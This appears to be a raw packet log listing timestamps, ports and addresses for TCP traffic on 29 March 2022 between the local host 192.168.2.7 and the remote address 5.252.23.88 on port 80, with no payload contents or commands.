Mar 29, 2022 06:51:52.128477097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128513098 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128551006 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128551006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128587961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128623009 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128635883 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128639936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128643036 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128659010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128695965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128722906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128750086 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128751040 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128777981 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128806114 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128839970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128869057 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128870010 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.128904104 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128940105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.128978014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129010916 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129018068 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129024982 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129029036 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129031897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129046917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129077911 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129082918 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129090071 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129118919 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129153967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129189014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129224062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129260063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129295111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129314899 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129329920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129363060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129364967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129368067 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129399061 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129434109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129468918 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129492998 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129498959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129503965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129540920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129575968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129611015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129637003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129646063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129674911 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129679918 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129681110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129715919 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129750967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.129782915 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129789114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.129791975 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.130386114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.159557104 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159611940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159652948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159692049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159732103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159775019 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159883976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.159914970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.159917116 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.159996986 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160002947 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160049915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160124063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160164118 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160214901 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160218954 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160226107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160255909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160300970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160343885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160372019 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160378933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160383940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160424948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160432100 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160437107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160466909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160506964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160512924 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160517931 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160548925 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160589933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160630941 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160671949 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160715103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160742044 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160758018 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160764933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160768986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160773039 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160804033 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160810947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160866022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160876989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.160943985 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.160989046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161029100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161070108 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161111116 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161111116 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161149979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161190987 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161211014 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161231995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161245108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161250114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161253929 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161257029 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161272049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161262035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161294937 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161314964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161360979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161393881 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161401033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161459923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161474943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161482096 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161499977 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161549091 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161597013 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161634922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161675930 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161715031 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161675930 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161735058 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161740065 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161756992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161796093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161811113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161818027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161820889 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161854982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161895037 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161911011 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161919117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.161933899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.161973953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162003040 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162014961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162034035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162054062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162094116 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162158012 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162168980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162177086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162225008 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162265062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162306070 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162326097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162333012 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162344933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162384033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162425041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162450075 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162461996 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162478924 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162501097 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162520885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162542105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162578106 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162597895 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162604094 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162617922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162657022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162668943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162678003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162698030 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162738085 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162775993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162791967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162803888 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162813902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162853956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162867069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162878990 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.162890911 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162930012 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.162967920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163009882 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163049936 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163088083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163120985 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163125992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163156986 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163165092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163176060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163180113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163182974 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163203001 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163218021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163242102 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163280964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163322926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163330078 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163336992 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163363934 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163394928 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163402081 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163440943 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163479090 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163487911 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163494110 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163516998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163554907 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163594007 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163609028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163615942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163633108 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163652897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163660049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163674116 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163695097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163711071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163749933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163790941 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163801908 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163810015 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163827896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163866997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163886070 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163892984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.163902998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163942099 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.163980961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164017916 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164026976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164032936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164056063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164094925 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164130926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164139986 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164146900 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164169073 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164218903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164230108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164237022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164258003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164283991 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164299965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164338112 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164349079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164355993 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164376974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164417982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164426088 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164432049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164454937 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164494991 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164525986 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164534092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164545059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164551020 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164571047 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164580107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164609909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164648056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164688110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164694071 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164699078 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164726973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164764881 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164803028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164843082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164880991 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.164946079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164959908 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164964914 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164968967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164973021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.164975882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.194752932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.194833040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.194899082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.194936037 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.194972038 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.194981098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195005894 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195009947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195009947 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195030928 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195048094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195086002 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195135117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195137024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195139885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195187092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195209980 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195235014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195260048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195269108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195272923 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195285082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195308924 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195329905 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195331097 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195333958 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195352077 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195378065 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195379019 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195383072 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195395947 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195400953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195420027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.195442915 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195447922 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.195461035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225090027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225281954 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225354910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225383997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225431919 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225585938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225610971 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225621939 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225665092 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225680113 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225702047 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225723028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225723982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225728035 CEST	49793	80	192.168.2.7	5.252.23.88
